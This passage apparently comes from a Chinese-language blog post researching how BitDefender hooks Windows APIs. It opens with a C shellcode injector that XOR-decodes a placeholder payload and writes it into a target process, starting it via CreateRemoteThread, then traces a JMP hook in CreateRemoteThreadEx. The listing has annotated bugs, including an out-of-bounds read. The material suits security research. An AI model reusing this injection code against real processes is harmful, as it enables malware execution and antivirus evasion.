![a693fddaefb8f8f128aba9db8d10c9e6.png](https://img-blog.csdnimg.cn/img_convert/a693fddaefb8f8f128aba9db8d10c9e6.png)
#include // This code was written for researching purpose, you have to edit it before using it in real-world
// NOTE(review): the header name after #include was lost when the page was rendered (angle brackets
// stripped); presumably <windows.h>, with <stdio.h>/<stdlib.h> for printf/exit/atoi — confirm against
// the original source before trying to build this listing.
// This code will decode your shellcode and write it directly to the memory

/*
 * Entry point: XOR-decodes an embedded byte string, writes it byte by byte into
 * another process, then starts a remote thread at the written address.
 *
 * The call chain used here — OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx
 * with PAGE_EXECUTE_READWRITE -> WriteProcessMemory -> CreateRemoteThread — is
 * the classic remote-injection sequence that user-mode security products hook;
 * the rest of this page shows CreateRemoteThreadEx being hooked by a BitDefender
 * module when exactly this program is run. From a detection standpoint, an RWX
 * allocation followed by thread creation in a foreign process is the behaviour
 * to alert on.
 *
 * argv[1]: target process id, decimal.
 * Returns 0 on every path (the usage error leaves via exit(0)); failures are only
 * reported on stdout.
 */
int main(int argc, char* argv[]) {
    // Our Shellcode — a placeholder string standing in for the XOR-encoded payload bytes.
    unsigned char shellcode[] = "MyEncodedshellcode";
    // Check arguments counter
    if(argc != 2){
        printf("[+] Usage : decoder.exe [PID]\n");
        exit(0);
    }
    // The process id we want to inject our code to passed to the executable
    // Use GetCurrentProcessId() to inject the shellcode into original process
    // atoi() reports no errors: a non-numeric argument silently becomes PID 0 (strtol would surface this).
    int process_id = atoi(argv[1]);
    // Define the base_address variable which will save the allocated memory address
    LPVOID base_address;
    // Retrive the process handle using OpenProcess
    HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id);
    if (process) {
        printf("[+] Handle retrieved successfully!\n");
        printf("[+] Handle value is %p\n", process);
        // sizeof(shellcode) counts the string literal's terminating NUL as well, so one extra byte is reserved.
        base_address = VirtualAllocEx(process, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if (base_address) {
            // %x with a pointer argument is a format/type mismatch (UB; value truncated to 32 bits on x64) — %p is the matching specifier.
            printf("[+] Allocated based address is 0x%x\n", base_address);
            // Data chars counter
            int i;
            // Base address counter
            int n = 0;
            // NOTE(review): the loop bound is `<=`, so the last iteration reads shellcode[sizeof(shellcode)],
            // one element past the end of the array (undefined behaviour); `<` would stay in bounds.
            for(i = 0; i<=sizeof(shellcode); i++){
                // Decode shellcode opcode (you can edit it based on your encoder settings)
                // Single-byte XOR with a fixed key; the same key must have been used by the encoder.
                char DecodedOpCode = shellcode[i] ^ 0x01;
                // Write the decoded bytes in memory address
                // base_address is LPVOID (void *): pointer arithmetic on it relies on a compiler extension
                // (accepted by GCC, rejected by MSVC) — a cast to an unsigned char pointer would be portable.
                if(WriteProcessMemory(process, base_address+n, &DecodedOpCode, 1, NULL)){
                    // Write the memory address where the data was written
                    // Same %X/pointer mismatch as the allocation message above.
                    printf("[+] Byte 0x%X wrote sucessfully! at 0x%X\n", DecodedOpCode, base_address + n);
                    // Increase memory address by 1
                    n++;
                }
                // A failed WriteProcessMemory is silently skipped: n is not advanced and no error is printed.
            }
            // Run our code as RemoteThread
            // NOTE(review): dwStackSize=100 and dwCreationFlags=0x50002 are unusual; 0x50002 is not a flag
            // combination I can confirm from the CreateRemoteThread documentation — verify. The returned
            // thread handle and any failure (NULL return) are ignored.
            CreateRemoteThread(process, NULL, 100,(LPTHREAD_START_ROUTINE)base_address, NULL, NULL, 0x50002);
        } else {
            printf("[+] Unable to allocate memory ..\n");
        }
    } else {
        printf("[-] Enable to retrieve process handle\n");
    }
    // The process handle from OpenProcess is never released (no CloseHandle on any path).
}
编译该文件并运行，向explorer.exe注入shellcode后，将得到以下信息:
![f41615c1ec9bcf0209f87f489edabaf3.png](https://img-blog.csdnimg.cn/img_convert/f41615c1ec9bcf0209f87f489edabaf3.png)
注入的定制模块
从上图可以看出,可执行文件中加载一个名为atcuf64.dll的文件,并且该文件与BitDefender有关。 因此,研究人员开始从最可疑的“CreateRemoteThread ”开始,调试在shellcode注入中调用的主要win32APIs,反汇编结果如下所示。![11d6494400fbec79c3845750d37e8df5.png](https://img-blog.csdnimg.cn/img_convert/11d6494400fbec79c3845750d37e8df5.png)
CreateRemoteThread的反汇编代码
这里并没有可疑之处,但是从执行流程可以看出,接下来将使用CreateRemoteThreadEx API,因此对其进行反汇编,结果如下所示:![b95549d5d00a200094fb1cfc0041a599.png](https://img-blog.csdnimg.cn/img_convert/b95549d5d00a200094fb1cfc0041a599.png)
CreateRemoteThread Hooked
该结果并不寻常,可以看出在API的开头部分有一个JMP指令,如果跟踪执行流程,将看到下列情况: